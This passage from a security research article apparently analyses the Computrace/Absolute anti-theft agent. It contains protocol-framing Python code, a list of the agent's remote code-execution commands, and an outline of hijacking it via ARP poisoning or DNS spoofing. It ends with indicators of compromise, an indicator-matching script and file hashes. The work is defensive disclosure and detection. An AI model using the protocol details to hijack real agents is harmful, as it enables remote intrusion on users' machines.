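        raise ValueError("data length does not match the Size field")
    return ServerPacket(address, size, data, seq)


def build_client_response(session_id: int, data: bytes, seq: int,
                          cksum_fn: Hash16 = placeholder_cksum) -> bytes:
    """Client reply: Session ID, size of Response Data, the data, Seq, Cksum."""
    return _frame(struct.pack("<IH", session_id, len(data)) + data + bytes([seq & 0xFF]), cksum_fn)


def parse_client_response(frame: bytes, cksum_fn: Hash16 = placeholder_cksum) -> Tuple[int, bytes, int]:
    body = _unframe(frame, cksum_fn)
    session_id, size = struct.unpack_from("<IH", body, 0)
    data, seq = body[6:-1], body[-1]
    if len(data) != size:
        raise ValueError("response data length does not match the size field")
    return session_id, data, seq
```

The constructed Session ID 0x7E7D1234 contains both reserved bytes, so the framed handshake is two bytes longer than its body while the checksum still covers the unescaped fields; a frame with a single flipped byte fails the checksum and is rejected, which is the behaviour the article describes for the agent.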

In addition to that, the Handshake Packet provides the basic address of the Session object in the memory of the Small Agent. This might be sufficient to execute arbitrary code. However, on systems with DEP and ASLR enabled some extra steps may significantly ease the process of running code and make the process smoother and more stable. That is why there is extra processing implemented in the Small Agent. Upon receiving and writing data to a defined memory location it checks a special field in the Session object which defines a built-in basic command to execute. If the C&C server changes the value of this field, the agent may run a special command with parameters. The following commands are implemented in the module we analyzed:

  • Get handle of a module in memory (calls GetModuleHandleA)
  • Get address of an exported procedure (calls GetProcAddress)
  • Reserve memory on heap
  • Free memory on heap
  • Execute chain of commands from memory location
  • Call a function with specified memory address and parameters

This adds extra flexibility and allows an engineer to precisely allocate memory, transfer data in it and execute any extra code if required.

The protocol used by the Small Agent provides the basic feature of remote code execution. The protocol doesn’t use any encryption or authorization with the remote server, which creates numerous opportunities for remote attacks in a hostile network environment. Although encryption seems to be added to the protocol at some later stages of communication, an attacker may utilize the basic unencrypted protocol to successfully hijack the system remotely. A typical attack on a local area network would be to redirect all traffic from a computer running Small Agent to the attacker’s host via ARP-poisoning. Another possibility is to use a DNS service attack to trick the agent into connecting to a fake C&C server. We believe there are more ways to accomplish such attacks, though this is beyond the scope of the current research.

7. Conclusions

When we first found and analyzed Computrace we mistakenly thought it was malicious software, because it used so many of the tricks that are popular in current malware. It has specific anti-debugging and anti-reverse engineering techniques, injects into the memory of other processes, establishes secret communication, patches system files on disk (autochk.exe), keeps configuration files encrypted, and finally drops a Windows executable directly from BIOS/firmware.

Such aggressive behavior by Computrace Agent was the reason it was detected as malware in the past. According to some reports on the Internet, Computrace was detected by Microsoft as VirTool:Win32/BeeInject. Here is how Microsoft describes this generic threat name:

[Image: Microsoft’s description of VirTool:Win32/BeeInject]

Nevertheless, detection of Computrace modules was later removed by Microsoft and some AV vendors. Computrace executables are currently allowlisted by most AV companies.

We believe that Computrace was designed with good intentions, but our research shows that vulnerabilities in this software can turn a useful tool into a powerful weapon for cybercriminals. We believe that such a powerful tool needs to have powerful authentication and encryption mechanisms to continue fighting the good fight.

Although there was no evidence of intentional secret activation of Computrace modules on the computers we analyzed, we believe that the number of computers with Computrace activated may be surprisingly high. We do not believe that Absolute Software or any PC manufacturers have any reason to secretly activate this module, but it’s clear that if there are a lot of computers with activated Computrace Agents, it is the responsibility of the manufacturers and Absolute Software to notify those users and explain how they can deactivate it if they don’t want to use Absolute Software services. Otherwise, these orphaned agents will keep on running unnoticed and provide opportunities for remote exploitation.

8. References

  1. http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Deactivate_the_Rootkit
  2. http://www.absolute.com/en/partners/bios-compatibility
  3. http://www.absolute.com/en/resources/whitepapers/absolute-persistence-technology
  4. https://www.google.com/patents/US20060272020
  5. http://en.wikipedia.org/wiki/LoJack

Appendix A: Indicators of Computrace Agent Activity

  1. One of the following processes is running:
    1. rpcnet.exe
    2. rpcnetp.exe
    3. 32-bit svchost.exe running on 64-bit system (can’t serve as complete indicator)
  2. One of the following files exist on the hard drive:
    1. %WINDIR%\System32\rpcnet.exe
    2. %WINDIR%\System32\rpcnetp.exe
    3. %WINDIR%\System32\wceprv.dll
    4. %WINDIR%\System32\identprv.dll
    5. %WINDIR%\System32\Upgrd.exe
    6. %WINDIR%\System32\autochk.exe.bak (for FAT)
    7. %WINDIR%\System32\autochk.exe:bak (for NTFS)
  3. The system resolves one of the following domain names using DNS:
    1. search.namequery.com
    2. search.us.namequery.com
    3. search64.namequery.com
    4. bh.namequery.com
    5. namequery.nettrace.co.za
    6. search2.namequery.com
    7. m229.absolute.com or any m*.absolute.com
  4. The system connects to the following IP: 209.53.113.223
  5. One of the following registry keys exist:
    1. HKLM\System\CurrentControlSet\Services\rpcnet
    2. HKLM\System\CurrentControlSet\Services\rpcnetp
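The indicator list above and the process chain described for the rpcnetp and rpcnet services (service binary, child svchost.exe, then iexplore.exe under the user account) can be turned into a host check. The following is an added example written for this article, not Kaspersky Lab tooling. It runs over a constructed host snapshot (a dict of processes, files, DNS queries, connections and registry keys); on a real Windows host those fields would be filled from a process listing, a listing of %WINDIR%\System32, DNS or proxy logs and a registry export. Treating the service-to-svchost-to-iexplore chain as a finding and grading the 32-bit svchost.exe indicator as weak are this example's choices.

```python
"""Matcher for the Appendix A indicators over a constructed host snapshot.

Added example, not Kaspersky Lab code. The process-tree heuristic follows the
rpcnet(p).exe -> svchost.exe -> iexplore.exe chain described in the article.
"""
import fnmatch
from typing import Dict, List, Tuple

STRONG_PROCESSES = {"rpcnet.exe", "rpcnetp.exe"}
FILES = [
    r"%WINDIR%\System32\rpcnet.exe", r"%WINDIR%\System32\rpcnetp.exe",
    r"%WINDIR%\System32\wceprv.dll", r"%WINDIR%\System32\identprv.dll",
    r"%WINDIR%\System32\Upgrd.exe",
    r"%WINDIR%\System32\autochk.exe.bak",   # patched autochk backup on FAT
    r"%WINDIR%\System32\autochk.exe:bak",   # alternate data stream on NTFS
]
DOMAINS = [
    "search.namequery.com", "search.us.namequery.com", "search64.namequery.com",
    "bh.namequery.com", "namequery.nettrace.co.za", "search2.namequery.com",
    "m*.absolute.com",                       # m229.absolute.com or any m*.absolute.com
]
C2_IP = "209.53.113.223"
REG_KEYS = [
    r"HKLM\System\CurrentControlSet\Services\rpcnet",
    r"HKLM\System\CurrentControlSet\Services\rpcnetp",
]

Finding = Tuple[str, str, str]   # (strength, category, evidence)


def match_indicators(snap: Dict) -> List[Finding]:
    hits: List[Finding] = []
    windir = snap.get("windir", r"C:\Windows")
    procs = snap.get("processes", [])        # dicts: pid, ppid, name, bits
    by_pid = {p["pid"]: p for p in procs}

    for p in procs:
        name = p["name"].lower()
        if name in STRONG_PROCESSES:
            hits.append(("strong", "process", f"{name} (pid {p['pid']})"))
        elif name == "svchost.exe" and p.get("bits") == 32 and snap.get("os_bits") == 64:
            # Appendix A says this alone is not a complete indicator
            hits.append(("weak", "process", f"32-bit svchost.exe (pid {p['pid']}) on 64-bit OS"))
        if name == "iexplore.exe":
            parent = by_pid.get(p.get("ppid"))
            grand = by_pid.get(parent.get("ppid")) if parent else None
            if (parent and parent["name"].lower() == "svchost.exe"
                    and grand and grand["name"].lower() in STRONG_PROCESSES):
                hits.append(("strong", "process-tree",
                             f"{grand['name']} -> svchost.exe -> iexplore.exe (pid {p['pid']})"))

    present = {f.lower() for f in snap.get("files", [])}
    for ioc in FILES:
        path = ioc.replace("%WINDIR%", windir).lower()
        if path in present:
            hits.append(("strong", "file", path))
    for q in snap.get("dns_queries", []):
        if any(fnmatch.fnmatchcase(q.lower(), pat) for pat in DOMAINS):
            hits.append(("strong", "dns", q))
    for ip in snap.get("connections", []):
        if ip == C2_IP:
            hits.append(("strong", "network", ip))
    keys = {k.lower() for k in snap.get("registry_keys", [])}
    for k in REG_KEYS:
        if k.lower() in keys:
            hits.append(("strong", "registry", k))
    return hits


def verdict(hits: List[Finding]) -> str:
    """Collapse the findings into one label for triage."""
    if any(h[0] == "strong" for h in hits):
        return "computrace agent likely active"
    return "inconclusive" if hits else "no indicators"


# Constructed snapshot for this example; not data from a real host.
SAMPLE_SNAPSHOT = {
    "windir": r"C:\Windows",
    "os_bits": 64,
    "processes": [
        {"pid": 4, "ppid": 0, "name": "System", "bits": 64},
        {"pid": 612, "ppid": 500, "name": "rpcnet.exe", "bits": 32},
        {"pid": 700, "ppid": 612, "name": "svchost.exe", "bits": 32},
        {"pid": 812, "ppid": 700, "name": "iexplore.exe", "bits": 32},
        {"pid": 900, "ppid": 500, "name": "svchost.exe", "bits": 64},
    ],
    "files": [r"C:\Windows\System32\rpcnet.exe",
              r"C:\Windows\System32\autochk.exe:bak",
              r"C:\Windows\System32\notepad.exe"],
    "dns_queries": ["search.namequery.com", "m229.absolute.com", "www.example.com"],
    "connections": ["209.53.113.223", "93.184.216.34"],
    "registry_keys": [r"HKLM\System\CurrentControlSet\Services\rpcnet"],
}

if __name__ == "__main__":
    for strength, category, evidence in match_indicators(SAMPLE_SNAPSHOT):
        print(f"[{strength:6}] {category:12} {evidence}")
    print(verdict(match_indicators(SAMPLE_SNAPSHOT)))
```

The file and registry comparisons are case-insensitive because Windows paths and key names are, and the `m*.absolute.com` entry is matched as a glob so that any `m*.absolute.com` host counts, as the indicator list states.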

Below are some of the files that were discovered as rpcnetp or rpcnet service binaries:

0153ad739956b12bf710c7039186728d
01a19f74cfb19cc61d62009bcfa59961
076a360ee0cfc5ca2afc8468fa1ae709
130206a40741aa57f3778bb70e593e16
19a51da66e818f0e10973e1082c79a70
19e67bd685019dafadfe524517dab145
1f2d10f767c7145a8d2a3fbbf66bed7a
27d43a7f03260ebdf81dd6515646510b
3a1ed2730cee3ec7d6d5091be5071eaa
418f527e59508480cfc17644d8387736
4476ccfd883c603cebbc317c6c41c971
4a3b02ac2e1635c0a4603b32d447fbb2
4bcf98b48bee5e7094d0cf026d4edce4
5235a32d018b79f065c64b06bd4001be
5515c17117a37fc808fc7a43a37128b0
5829887d2304c08237a5f43c42931296
5a5bb037b8e256a3304f113a187b1891
5e071026cb4c890a3584e02af1e3daf8
6846e002291086843463238e525c8aaa
77f57671b08e539e3232bf95a2ac8aec
78c696e5fd0041d8a5ce5e5e15b6f2f3
7a7cd44a4113046869be5ab8341f759f
8282e68524af7a46afc1bac2105c6cda
86332af92a6a80660bb8659711378140
8f95ce32c2596771174f7054a78f4a84
925f2df6a96637d23c677b33a07b52c1
961d7bbefa57d1b260db075404454955
a9e0a97c29bd110f54beb465d8ec3e52
aaaee16f8cbd6a35c0f6b37358b3ce54
b4c3723eb687b0e63aeea2974b8d73ba
b7534d5ed3b01ff3a96b43b855b2a103
bb7ef397f31c184f4089fc9bac04566f
c1b19ad11821780b67f4c545beb270c0
c6089ec6ae62fe264896a91d951d0c79
cacebf514be693301c1498e216b12dbb
cbb0d507e47d7f0ae3e5f61ea8feff08
cde233aa0676f5307949c0a957a2f360
cf8bcf7138cc855d885271c4ee7e8a75
d2561d67e34ff53f99b9eaab94e98e2a
e2e9dcce8d87608e4ba48118b296407f
e57892858a7d3a7799eacb06783bd819
e583977f36980125c01898f9e86c6c87
ed9b58f56a13fbb44c30d18b9b5c44d0
ee08ce8247ffb26416b32d8093fe0775
eeab12e6f535ee0973b3ddb99287e06c
ef8d08b07756edc999fbc8cfac32dc23
f03f740fde80199731c507cdd02eb06e
f259382b6fa22cae7a16d2d100eb29e4
f42dbd110320b72d8ff72f191a78e5d5
fc0ba4c9a301b653ee2c437e29ed545e
